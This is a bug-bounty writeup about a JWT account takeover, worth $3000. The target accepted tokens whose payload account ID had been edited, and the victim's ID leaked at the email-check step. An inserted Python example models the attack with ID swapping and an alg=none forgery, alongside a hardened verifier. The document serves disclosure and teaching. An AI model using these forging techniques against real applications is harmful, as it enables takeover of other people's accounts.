Abusing JSON Web Token to steal accounts — 3000$
Hello fellow hackers! 👋
My name is Filipe Azevedo. I am a cyber security researcher from Portugal, and I work mainly for Intigriti and HackerOne.
Today I’m going to show you a recent finding on a private program.
So, let’s go to the vulnerability.
What’s JWT?
JWTs provide a stateless approach to authentication: instead of tracking session data on the server, the server issues a signed token and the client presents it with every request. Note that an ordinary (JWS) JWT is signed, not encrypted; its contents are only base64url-encoded, so anyone who holds the token can read them. An example JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
The first part, the header, tells the recipient the signing algorithm and the token type.
The second part, the payload, carries the claims: the information the token passes along. It is not encrypted, just base64url-encoded, so anyone holding the token can read it and re-encode it with different values.
Lastly, the signature is computed over the header and payload with a key the issuer holds. It is what lets the server detect that a token has been edited, but only if the server actually verifies it: a server that decodes the payload without checking the signature will accept any edit.
You can learn more about JWT here.
Detection and exploitation of the vulnerability
I was looking for bugs such as XSS, SQL injection and IDORs, but the target was pretty secure. So I started to search for bugs in the authentication flow.
I noticed that the only difference between the two JWTs was the ID present in the payload. I found out that this value was the user's account number. So, if I changed my ID to the victim's, I could access any account.
How to find out the victim’s ID
There was no dedicated login and registration page. The user entered their email and clicked "Next". The server would check the email and forward the user to login or registration.
But during this process, the ID was leaked. If the email existed, a request was sent with the email and the ID. Something like this:
email=victim@gmail.com&id=123456
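To make both halves of this writeup concrete, here is an added Python example (mine, not the author's code and not the target's) that models the whole chain: the point from the "What's JWT?" section that a token's payload can be read and re-encoded without any key, and the ID leak described in this section. It assumes an HS256 signing secret, a constructed email directory behind the "enter your email" step, and two toy servers, one that decodes the token without verifying the signature and one that verifies it. The secret, the directory, the `id`/`email` field names and the alg=none forgery are assumptions that go beyond what the page states about the target.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# The sample token from the page (the well-known jwt.io example). Its payload can be
# read by anyone holding it; no key is needed, because a JWS payload is only encoded.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)
# Constructed stand-ins for the target (assumptions, not the real app): a signing
# secret and the email directory behind the "enter your email, click Next" step.
SECRET = b"constructed-example-secret"
DIRECTORY = {"attacker@example.com": 111111, "victim@example.com": 123456}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    """JSON without whitespace, then base64url without padding (one JWT segment)."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Read header and payload without looking at the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token: header.payload.HMAC-SHA256(header.payload)."""
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload only if alg is HS256 and the HMAC matches, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:
        return None
    if header.get("alg") != "HS256":
        return None  # the token must not pick the algorithm ("none", RS256->HS256 confusion)
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(payload_b64))


def email_check(email: str) -> Optional[str]:
    """Constructed model of the email step: the response that leaked the account number."""
    return None if email not in DIRECTORY else f"email={email}&id={DIRECTORY[email]}"


def swap_id(token: str, new_id: int) -> str:
    """Re-encode the payload with another account number, keeping the old signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload["id"] = new_id
    return header_b64 + "." + encode_part(payload) + "." + sig_b64


def alg_none_token(payload: dict) -> str:
    """Forgery that needs no secret: alg=none with an empty signature segment."""
    return encode_part({"alg": "none", "typ": "JWT"}) + "." + encode_part(payload) + "."


def vulnerable_current_user(token: str) -> int:
    """The bug class: decode and trust the payload, never check the signature."""
    return decode_unverified(token)[1]["id"]


def hardened_current_user(token: str) -> Optional[int]:
    """Only a token whose signature verifies under the server secret names a user."""
    payload = verify_hs256(token, SECRET)
    return None if payload is None else payload["id"]


def run_attack() -> dict:
    """The chain from the writeup: leak the victim's id, swap it in, try both servers."""
    own = sign_hs256({"id": DIRECTORY["attacker@example.com"], "email": "attacker@example.com"}, SECRET)
    leaked = email_check("victim@example.com")  # "email=victim@example.com&id=123456"
    victim_id = int(dict(p.split("=", 1) for p in leaked.split("&"))["id"])
    forged = swap_id(own, victim_id)
    return {
        "victim_id": victim_id,
        "vulnerable_accepts_forged": vulnerable_current_user(forged),
        "hardened_accepts_forged": hardened_current_user(forged),
        "hardened_accepts_alg_none": hardened_current_user(alg_none_token({"id": victim_id})),
        "hardened_accepts_genuine": hardened_current_user(own),
    }
```

Calling `run_attack()` shows the vulnerable server returning the victim's id for the forged token, because it never looks at the signature, while the hardened server rejects it and also rejects the alg=none token, because it fixes the algorithm server-side and compares the HMAC in constant time. Whether the target skipped verification, accepted alg=none or used a guessable secret is not stated in the writeup; any of the three lets an edited payload through.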
Bug reported: Apr 19, 2021
Bounty awarded (3000$): May 31, 2021
For queries, you can DM me on Twitter. Feedback is always welcome!
Thanks for reading.
Happy Hacking!!!